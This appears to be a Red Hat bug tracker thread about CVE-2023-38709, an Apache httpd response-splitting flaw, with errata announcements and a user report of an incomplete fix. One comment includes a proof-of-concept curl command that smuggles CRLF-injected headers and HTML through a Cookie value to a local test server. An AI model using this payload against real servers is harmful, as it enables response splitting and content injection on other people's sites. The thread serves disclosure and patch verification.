Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses. References: https://httpd.apache.org/security/vulnerabilities_24.html https://svn.apache.org/viewvc?view=revision&revision=1916770
Created httpd tracking bugs for this issue: Affects: fedora-all [bug 2273492]
This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2024:4197 https://access.redhat.com/errata/RHSA-2024:4197
When applying the patch for this issue it seems to entirely rewrite the /var/www/html folder and deletes its content using the below: 2.4.37-65.module+el8.10.0+21982+14717793
(In reply to athreadgill from comment #6) > When applying the patch for this issue it seems to entirely rewrite the > /var/www/html folder and deletes its content using the below: > 2.4.37-65.module+el8.10.0+21982+14717793 I'm unable to reproduce this. The scripts included in the httpd package do not touch /var/www/html. If you are able to reproduce this I recommend opening a support case ideally with an sos report of the situation before and after the update.
Created attachment 2043759 [details] POC to demonstrate CVE-2023-38709 vulnerability I have a POC that demonstrate the patch for Red Hat 8 did not resolve the vulnerability. Steps to reproduce: 1. compile $ sudo apxs -i -a -c mod_example.c 2. modify /etc/httpd/conf/httpd.conf by adding the following AddHandler example-handler .sum 3. start httpd sudo httpd 4. run curl $ curl -H 'Cookie: abc\r\nContent-Length: 8\r\n<p>a</p>' -IL 'http://localhost/a.sum' HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 00:03:43 GMT Server: Apache/2.4.37 (Rocky Linux) Content-Length: 18 Content-Type: text/html Cookie: abc\r\nContent-Length: 8\r\n<p>a</p>; charset=UTF-8 5. Expected behavior $ curl -H 'Cookie: abc\r\nContent-Length: 8\r\n<p>a</p>' -IL 'http://localhost/a.sum' HTTP/1.1 500 Internal Server Error Date: Tue, 06 Aug 2024 20:31:00 GMT Server: Apache/2.5.1-dev (Unix) Content-Type: text/html; charset=iso-8859-1 Connection: close
This issue has been addressed in the following products: JBoss Core Services on RHEL 7 JBoss Core Services for RHEL 8 Via RHSA-2024:6927 https://access.redhat.com/errata/RHSA-2024:6927
This issue has been addressed in the following products: Red Hat JBoss Core Services Via RHSA-2024:6928 https://access.redhat.com/errata/RHSA-2024:6928